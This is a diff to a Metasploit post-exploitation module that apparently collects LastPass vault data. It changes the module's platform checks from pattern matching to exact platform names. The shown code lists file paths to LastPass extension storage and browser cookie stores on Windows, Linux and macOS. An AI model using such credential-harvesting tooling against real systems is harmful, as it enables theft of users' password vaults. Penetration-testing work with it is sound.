@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    if session.platform =~ /win/ && session.type == "shell" # No Windows shell support
+    if session.platform == 'windows' && session.type == "shell" # No Windows shell support
       print_error "Shell sessions on Windows are not supported"
       return
     end
@@ -68,7 +68,6 @@ class MetasploitModule < Msf::Post
 
   # Returns a mapping of lastpass accounts
   def build_account_map
-    platform = session.platform
     profiles = user_profiles
     account_map = {}
 
@@ -78,8 +77,8 @@ class MetasploitModule < Msf::Post
       localstorage_path_map = {}
       cookies_path_map = {}
 
-      case platform
-      when /win/
+      case session.platform
+      when 'windows'
         browser_path_map = {
           'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
           'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles",
@@ -98,7 +97,7 @@ class MetasploitModule < Msf::Post
           'IE' => "#{user_profile['LocalAppData']}\\Microsoft\\Windows\\INetCookies\\Low",
           'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Cookies"
         }
-      when /unix|linux/
+      when 'unix', 'linux'
         browser_path_map = {
           'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
           'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox",
@@ -114,7 +113,7 @@ class MetasploitModule < Msf::Post
           'Firefox' => "", # It's set programmatically
           'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Cookies"
         }
-      when /osx/
+      when 'osx'
         browser_path_map = {
           'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
           'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles",
@@ -134,7 +133,7 @@ class MetasploitModule < Msf::Post
           'Safari' => "#{user_profile['AppData']}/Cookies/Cookies.binarycookies"
         }
       else
-        print_error "Platform not recognized: #{platform}"
+        print_error "Platform not recognized: #{session.platform}"
       end
 
       account_map[account] = {}
@@ -194,7 +193,7 @@ class MetasploitModule < Msf::Post
           "LocalAppData" => "/Users/#{user_name}/Library/Application Support"
         )
       end
-    when /win/
+    when /windows/
       user_profiles |= grab_user_profiles
     else
       print_error "OS not recognized: #{os}"
@@ -807,6 +806,6 @@ class MetasploitModule < Msf::Post
 
   # Returns OS separator in a session type agnostic way
   def system_separator
-    return session.platform =~ /win/ ? '\\' : '/'
+    return session.platform == 'windows' ? '\\' : '/'
   end
 end
